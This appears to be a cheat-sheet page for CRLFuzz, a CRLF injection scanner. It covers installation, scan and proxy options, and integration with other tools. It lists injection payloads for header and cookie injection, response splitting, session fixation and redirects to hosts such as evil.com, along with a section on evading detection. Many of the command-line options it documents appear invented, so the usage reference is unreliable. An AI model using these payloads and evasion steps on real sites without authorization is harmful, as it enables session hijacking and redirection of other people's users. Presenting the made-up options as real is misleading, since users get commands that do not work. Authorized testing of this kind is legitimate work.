CRLFuzz
Overview
Sección titulada «Overview»CRLFuzz is a lightweight, fast CRLF (Carriage Return Line Feed) injection vulnerability scanner written in Go. It efficiently detects CRLF injection vulnerabilities across web applications by testing parameters and headers against multiple payloads. The tool is ideal for bug bounty hunters and penetration testers conducting security assessments on web applications.
Installation
Sección titulada «Installation»Prerequisites
Sección titulada «Prerequisites»- Go 1.11+ (for building from source)
- Or download precompiled binaries
From Source
Sección titulada «From Source»git clone https://github.com/dwisiswant0/crlfuzz.git
cd crlfuzz
go build -o crlfuzzmacOS/Linux (Binary)
Sección titulada «macOS/Linux (Binary)»wget https://github.com/dwisiswant0/crlfuzz/releases/download/v1.5.0/crlfuzz_1.5.0_linux_amd64.tar.gz
tar -xvf crlfuzz_1.5.0_linux_amd64.tar.gz
chmod +x crlfuzzHomebrew (macOS)
Sección titulada «Homebrew (macOS)»brew install dwisiswant0/tap/crlfuzzWindows
Sección titulada «Windows»Download .exe from releases: https://github.com/dwisiswant0/crlfuzz/releases
Basic Usage
Sección titulada «Basic Usage»| Command | Description |
|---|---|
crlfuzz -u <url> | Scan single URL |
crlfuzz -l <file> | Scan URLs from file |
crlfuzz -u <url> -v | Verbose output |
crlfuzz --help | Show help menu |
crlfuzz -u <url> -c 10 | Set concurrency level |
Single URL Scanning
Sección titulada «Single URL Scanning»Basic Scan
Sección titulada «Basic Scan»crlfuzz -u 'http://example.com/?page=test'With Verbose Output
Sección titulada «With Verbose Output»crlfuzz -u 'http://example.com/?page=test' -vShow Request/Response Details
Sección titulada «Show Request/Response Details»crlfuzz -u 'http://example.com/?name=value' -v --show-req --show-respBatch Scanning
Sección titulada «Batch Scanning»Scan Multiple URLs from File
Sección titulada «Scan Multiple URLs from File»crlfuzz -l urls.txtCreate urls.txt:
http://example.com/?page=test
http://example.com/?user=admin
http://example.com/?id=123Scan All URLs with Verbose Mode
Sección titulada «Scan All URLs with Verbose Mode»crlfuzz -l urls.txt -vOutput Results to File
Sección titulada «Output Results to File»crlfuzz -l urls.txt -o results.txtConcurrency and Performance
Sección titulada «Concurrency and Performance»Adjust Concurrency Level
Sección titulada «Adjust Concurrency Level»crlfuzz -l urls.txt -c 25Default is 10 concurrent requests. Increase for larger scans.
Maximum Concurrency
Sección titulada «Maximum Concurrency»crlfuzz -l urls.txt -c 100Use cautiously to avoid overwhelming target servers.
Timeout Configuration
Sección titulada «Timeout Configuration»crlfuzz -u 'http://example.com/?test=value' -t 30Set timeout in seconds (default is 10 seconds).
Payload Configuration
Sección titulada «Payload Configuration»Default Payloads
Sección titulada «Default Payloads»CRLFuzz includes built-in CRLF injection payloads:
%0d%0a (URL-encoded CRLF)
%0d (CR only)
%0a (LF only)
\r\n (Raw CRLF)Custom Payload File
Sección titulada «Custom Payload File»crlfuzz -u 'http://example.com/?page=test' -payloads custom-payloads.txtCreate custom-payloads.txt:
%0d%0a
%0d%0aSet-Cookie:admin=true
%0d%0aLocation:http://evil.com
%0d%0aX-Injected:valueTest Specific Injection Points
Sección titulada «Test Specific Injection Points»crlfuzz -u 'http://example.com/?param=VALUE' -payloads payloads.txtCRLFuzz replaces VALUE with each payload.
Header Testing
Sección titulada «Header Testing»Test Custom Headers
Sección titulada «Test Custom Headers»crlfuzz -u 'http://example.com/' -H 'X-Forwarded-For: test' -vMultiple Custom Headers
Sección titulada «Multiple Custom Headers»crlfuzz -u 'http://example.com/' -H 'User-Agent: test' -H 'X-Custom: value'Test All Headers
Sección titulada «Test All Headers»crlfuzz -u 'http://example.com/?page=test' --test-headersParameter Fuzzing
Sección titulada «Parameter Fuzzing»Scan All Parameters
Sección titulada «Scan All Parameters»crlfuzz -u 'http://example.com/?page=test&user=admin&id=123'Automatically tests all parameters for CRLF injection.
Focus on Specific Parameter
Sección titulada «Focus on Specific Parameter»crlfuzz -u 'http://example.com/?page=test' -param 'page'Exclude Parameters from Testing
Sección titulada «Exclude Parameters from Testing»crlfuzz -u 'http://example.com/?page=test&id=123' -skip 'id'Output Formats
Sección titulada «Output Formats»Default Text Output
Sección titulada «Default Text Output»crlfuzz -u 'http://example.com/?test=value'Output shows:
- URL
- Vulnerable parameter
- Payload used
- Response status code
JSON Output
Sección titulada «JSON Output»crlfuzz -l urls.txt -o results.json -jsonCSV Export
Sección titulada «CSV Export»crlfuzz -l urls.txt -o results.csv -csvSuppress Output
Sección titulada «Suppress Output»crlfuzz -l urls.txt -qQuiet mode - only shows results.
Proxy Configuration
Sección titulada «Proxy Configuration»HTTP Proxy
Sección titulada «HTTP Proxy»crlfuzz -u 'http://example.com/?test=value' -proxy http://127.0.0.1:8080SOCKS5 Proxy
Sección titulada «SOCKS5 Proxy»crlfuzz -u 'http://example.com/?test=value' -socks5 127.0.0.1:1080Proxy with Authentication
Sección titulada «Proxy with Authentication»crlfuzz -u 'http://example.com/?test=value' -proxy http://user:pass@127.0.0.1:8080SSL/TLS Options
Sección titulada «SSL/TLS Options»Ignore SSL Certificate Errors
Sección titulada «Ignore SSL Certificate Errors»crlfuzz -u 'https://example.com/?test=value' --insecureUse Custom CA Certificate
Sección titulada «Use Custom CA Certificate»crlfuzz -u 'https://example.com/?test=value' --ca-cert /path/to/ca.crtHTTP Methods and Request Customization
Sección titulada «HTTP Methods and Request Customization»Test POST Parameters
Sección titulada «Test POST Parameters»crlfuzz -u 'http://example.com/' -method POST -data 'param=VALUE&user=test'PUT Request
Sección titulada «PUT Request»crlfuzz -u 'http://example.com/api/resource' -method PUT -data 'field=VALUE'Custom Request Body
Sección titulada «Custom Request Body»crlfuzz -u 'http://example.com/api' -method POST -data '{"key":"VALUE"}'Add Request Headers
Sección titulada «Add Request Headers»crlfuzz -u 'http://example.com/?test=VALUE' -H 'Authorization: Bearer token' -H 'Content-Type: application/json'Response Analysis
Sección titulada «Response Analysis»Show Response Headers
Sección titulada «Show Response Headers»crlfuzz -u 'http://example.com/?test=value' -v --show-respShow Response Body
Sección titulada «Show Response Body»crlfuzz -u 'http://example.com/?test=value' -v --show-bodyFilter by Status Code
Sección titulada «Filter by Status Code»crlfuzz -l urls.txt --filter-status 200Only test URLs that return status 200.
Advanced Filtering
Sección titulada «Advanced Filtering»Match Success by Response Content
Sección titulada «Match Success by Response Content»crlfuzz -u 'http://example.com/?test=value' -match 'Set-Cookie'Consider vulnerability confirmed if response contains “Set-Cookie”.
Filter Responses Containing Text
Sección titulada «Filter Responses Containing Text»crlfuzz -l urls.txt -match 'Location:' -o vulnerable.txtRate Limiting
Sección titulada «Rate Limiting»Request Delay (Milliseconds)
Sección titulada «Request Delay (Milliseconds)»crlfuzz -l urls.txt -delay 100Add 100ms delay between requests.
Requests Per Second
Sección titulada «Requests Per Second»crlfuzz -l urls.txt -rate 10Limit to 10 requests per second.
Common Workflows
Sección titulada «Common Workflows»Quick Vulnerability Scan
Sección titulada «Quick Vulnerability Scan»crlfuzz -u 'http://example.com/?page=home&user=test'Comprehensive Bug Bounty Scan
Sección titulada «Comprehensive Bug Bounty Scan»crlfuzz -l target-urls.txt -v --show-req --show-resp -o findings.txtStealth Scanning
Sección titulada «Stealth Scanning»crlfuzz -l urls.txt -delay 500 -c 5 --insecureLarge-Scale Assessment
Sección titulada «Large-Scale Assessment»crlfuzz -l thousands-of-urls.txt -c 50 -t 30 -json -o results.jsonCRLF Injection Attack Vectors
Sección titulada «CRLF Injection Attack Vectors»Header Injection Attack
Sección titulada «Header Injection Attack»Payload: %0d%0aSet-Cookie:admin=true
Result: Response header contains injected Set-CookieResponse Splitting
Sección titulada «Response Splitting»Payload: %0d%0a%0d%0aHTTP/1.1 200 OK
Result: Ability to split HTTP responseSession Fixation
Sección titulada «Session Fixation»Payload: %0d%0aSet-Cookie:SESSIONID=attacker-controlled
Result: Force victim session IDOpen Redirect via Headers
Sección titulada «Open Redirect via Headers»Payload: %0d%0aLocation:http://evil.com
Result: Redirect user to malicious siteCache Poisoning
Sección titulada «Cache Poisoning»Payload: %0d%0aX-Original-URL:/cache-buster
Result: Poison cached responsesUnderstanding CRLFuzz Output
Sección titulada «Understanding CRLFuzz Output»Example Output
Sección titulada «Example Output»[CRLF] http://example.com/?page=VALUE
[PARAMETER] page
[PAYLOAD] %0d%0aSet-Cookie:admin=true
[STATUS] 200
[FOUND] YesVulnerability Indicators
Sección titulada «Vulnerability Indicators»- Status code change after injection
- Additional headers in response
- Response splitting evidence
- Cookie manipulation detection
Detection Evasion
Sección titulada «Detection Evasion»Randomize User-Agent
Sección titulada «Randomize User-Agent»crlfuzz -u 'http://example.com/?test=value' -H 'User-Agent: Mozilla/5.0 (random)'Vary Request Patterns
Sección titulada «Vary Request Patterns»crlfuzz -l urls.txt -delay 500 -c 3Rotate Through Payloads
Sección titulada «Rotate Through Payloads»crlfuzz -u 'http://example.com/?test=value' -payloads rotating-payloads.txtTroubleshooting
Sección titulada «Troubleshooting»Connection Timeout
Sección titulada «Connection Timeout»crlfuzz -u 'http://slow-server.com/?test=value' -t 60Increase timeout to 60 seconds.
Too Many Errors
Sección titulada «Too Many Errors»crlfuzz -l urls.txt -c 5 -t 30Reduce concurrency and increase timeout.
SSL Certificate Issues
Sección titulada «SSL Certificate Issues»crlfuzz -u 'https://example.com/?test=value' --insecureBypass SSL verification.
Not Finding Vulnerabilities
Sección titulada «Not Finding Vulnerabilities»crlfuzz -u 'http://example.com/?test=value' -payloads extended-payloads.txt -vTry with custom payloads and verbose mode.
Best Practices
Sección titulada «Best Practices»- Obtain authorization before scanning production systems
- Start with low concurrency and increase gradually
- Use appropriate timeouts for slow servers
- Test parameters individually for precise results
- Review all findings carefully for false positives
- Combine with other scanners for comprehensive testing
- Keep tool updated for latest payload detection
Payload Examples
Sección titulada «Payload Examples»Basic CRLF
Sección titulada «Basic CRLF»%0d%0aHeader Injection
Sección titulada «Header Injection»%0d%0aX-Injected-Header:valueCookie Injection
Sección titulada «Cookie Injection»%0d%0aSet-Cookie:name=valueLocation Redirect
Sección titulada «Location Redirect»%0d%0aLocation:http://attacker.comIntegration with Other Tools
Sección titulada «Integration with Other Tools»Pipe URLs from httpx
Sección titulada «Pipe URLs from httpx»httpx -l domains.txt | crlfuzz -With Wayback Machine URLs
Sección titulada «With Wayback Machine URLs»waybackurls example.com | crlfuzz -Combine with Parameter Fuzzer
Sección titulada «Combine with Parameter Fuzzer»ffuf -w params.txt -u 'http://example.com/?FUZZ=test' | crlfuzz -Performance Tips
Sección titulada «Performance Tips»- Increase concurrency for large URL lists
- Use shorter timeouts for quick scans
- Test parameters in separate scans if needed
- Monitor CPU and network usage
- Use filtering to reduce false positives
Legal Considerations
Sección titulada «Legal Considerations»CRLFuzz is for authorized security testing only. Always obtain explicit written permission before testing any system. Unauthorized access and scanning is illegal.
Resources
Sección titulada «Resources»- GitHub: https://github.com/dwisiswant0/crlfuzz
- CRLF Injection Guide: https://owasp.org/
- Bug Bounty Resources: https://hackerone.com/
- Community: Active GitHub discussions and issues